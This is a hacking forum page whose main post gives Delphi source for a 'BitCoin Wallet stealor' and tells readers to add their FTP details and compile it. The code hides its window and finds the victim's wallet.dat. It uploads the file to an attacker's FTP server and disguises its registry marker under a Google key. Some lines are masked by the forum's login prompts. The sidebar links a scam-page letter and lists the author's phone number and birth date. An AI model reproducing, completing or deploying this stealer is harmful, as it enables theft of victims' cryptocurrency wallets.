www.i4info.org

i4info Provides the best hacking Material. Latest hacking tutorials and tools are available here. It is the best place for hackers.

Latest topics

» BitCoin Wallet stealor New
Yesterday at 7:46 pm by Admin

» Muhammad Shahroze Rashid | Marketing Consultant
Yesterday at 1:48 pm by Admin

» Muhammad Shahroze Rashid | Sharp Mind, Sharp Innovations
Yesterday at 1:47 pm by Admin

» How to design an effective job ad
Yesterday at 1:45 pm by Admin

» Teen Patti Gold Hack & 3 Patti Chips Code Extra Bonus 2016
Tue Dec 06, 2016 4:38 am by shoytan er lara

» Content Marketing | Promotional Video
Fri Dec 02, 2016 2:45 pm by Admin

» How to start an Online Business | Complete Guide
Fri Dec 02, 2016 2:30 pm by Admin

» Zeeshan Bhatti
Wed Nov 30, 2016 3:18 pm by Admin

» USAA letter for scam page
Tue Nov 29, 2016 4:20 am by Hardyjsh1966

December 2016

MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 

Calendar Calendar

Affiliates


free forum

Forumotion on Facebook Forumotion on Twitter Forumotion on YouTubeForumotion on Google+

Visitors Counter


Flag Counter

About Author

Muhammad Shahroze Rashid
i4info
Web Developer
Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Auditor, a keen Security researcher.
samanabad
lahore, Punjab
54000
Pakistan
[email protected]
03064904829
DOB: 05/25/1992
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid is a Web Developer and Designer, Android Developer, InfoGrapher, IT consultant and Researcher
Reviewed by Google
Google
Date published: 01/19/2016
9 / 10 stars
Muhammad Shahroze Rashid
Muhammad Shahroze Rashid Web Developer & Designer,Researcher and Technical writer. An Information Security Consultant and System Audito
samanabad
lahore
Punjab
54000
Pakistan

BitCoin Wallet stealor [Delphi]

Share

Admin
Admin

Posts : 455
Reputation : 5
Join date : 2014-12-10
Age : 24
Location : Pakistan

BitCoin Wallet stealor [Delphi]

Post by Admin on Tue Jun 09, 2015 8:34 pm

U Need Only Change UR FTP Info in Code , then compile It )

Code:


 // Setup with your FTP details
          [You must be registered and logged in to see this link.] := '[You must be registered and logged in to see this link.]
          [You must be registered and logged in to see this link.] := 'username';
          [You must be registered and logged in to see this link.] := 'password';
          UploadPath := 'www/';
program dbs;

// BTC Wallet Stealer
// c0D3d By shahroze
// For Bits Family

{$IF CompilerVersion >= 21.0}
  {$WEAKLINKRTTI ON}
  {$RTTI EXPLICIT METHODS([]) PROPERTIES([]) FIELDS([])}
{$IFEND}

uses
  Windows, System.SysUtils, System.Classes, ShlObj, IdFTP, Registry;

// Function to set the window state hidden
function GetConsoleWindow: HWND; stdcall; external kernel32 name 'GetConsoleWindow';

// Function to get the AppData path
function AppDataPath: String;
const
  SHGFP_TYPE_CURRENT = 0;
var
  Path: array [0 .. MAXCHAR] of char;
begin
  SHGetFolderPath(0, CSIDL_LOCAL_APPDATA, 0, SHGFP_TYPE_CURRENT, @Path[0]);
  Result := StrPas(Path);
end;

// Function to check a file size
function FileSize(FileName: wideString): Int64;
var
  sr: TSearchRec;
begin
  if FindFirst(FileName, faAnyFile, sr) = 0 then
    Result := Int64(sr.FindData.nFileSizeHigh) shl Int64(32) + Int64(sr.FindData.nFileSizeLow)
  else
    Result := -1;

  FindClose(sr);
end;

// Function to generate random string
function RandomString(PLen: Integer): string;
var
  str: string;
begin
  Randomize;
  str := 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
  Result := '';
  repeat
    Result := Result + str[Random(Length(str)) + 1];
  until (Length(Result) = PLen);
end;

// ============================================================================

var
  Debug: Boolean;
  FTP: TIdFTP;
  REG: TRegIniFile;
  RegPath, RegValue, RegCurrentValue, Path, UploadPath, FileName: String;
  Error: String;

begin
  // The window should be hidden without using this API
  ShowWindow(GetConsoleWindow, SW_HIDE);

  // Debug or build release ?
  Debug := True;

  // Set registry key value (random)
  RegValue := '6556';

  // At the end of the first execution we will write a key in the registry.
  // Now we will try check if the key exists. If yes, it means
  // that the wallet has already be stolen. Avoid useless duplicates.
  try
    REG := TRegIniFile.Create;
    REG.RootKey := HKEY_CURRENT_USER;
    REG.OpenKeyReadOnly('Software');
    RegCurrentValue := REG.ReadString('Google', 'Version', '');
    REG.CloseKey;
    REG.Free;
  except
  end;

  // Check if wallet has been already stolen (to avoid duplicates)
  if not(RegCurrentValue = RegValue) then
  begin
    try
      // Generate path to Bitcoin wallet file
      if Win32MajorVersion >= 6 then
        // Microsoft Windows Vista and newer
        Path := ExpandFileName(AppDataPath + '\..\Roaming\Bitcoin\wallet.dat')
      else
        // Microsoft Windows XP
        Path := ExpandFileName(AppDataPath + '\..\Bitcoin\wallet.dat');

      // If wallet file exists, check the FileSize (skip large file > 10MB)
      if FileExists(Path) then
        if FileSize(Path) < 10000000 then
        begin
          // Generate a random filename
          FileName := RandomString(20) + '.dat';

          // Initialize upload via Indy FTP component
          FTP := TIdFTP.Create();
          [You must be registered and logged in to see this link.] := 20000;
          [You must be registered and logged in to see this link.] := 20000;

          // Setup with your FTP details
          [You must be registered and logged in to see this link.] := '[You must be registered and logged in to see this link.]
          [You must be registered and logged in to see this link.] := 'username';
          [You must be registered and logged in to see this link.] := 'password';
          UploadPath := 'www/';

          // Connect and upload
          if not Debug then
          begin
            [You must be registered and logged in to see this link.]
            [You must be registered and logged in to see this link.] UploadPath + FileName);
          end;

          // After upload attempt, disconnect and free the FTP component
          [You must be registered and logged in to see this link.]
          [You must be registered and logged in to see this link.]
          [You must be registered and logged in to see this link.]

          // Try to add a key to registry to avoid double execution
          try
            REG := TRegIniFile.Create;
            REG.RootKey := HKEY_CURRENT_USER;
            REG.OpenKey('Software', True);
            REG.WriteString('Google', 'Version', RegValue);
            REG.CloseKey;
            REG.Free;
          except
          end;
        end;
    except
      // Catch error, you never know...
      on E: Exception do
        Error := E.ClassName + ': ' + E.Message;
    end;
  end;

end.

    Similar topics

    -

    Current date/time is Thu Dec 08, 2016 10:50 am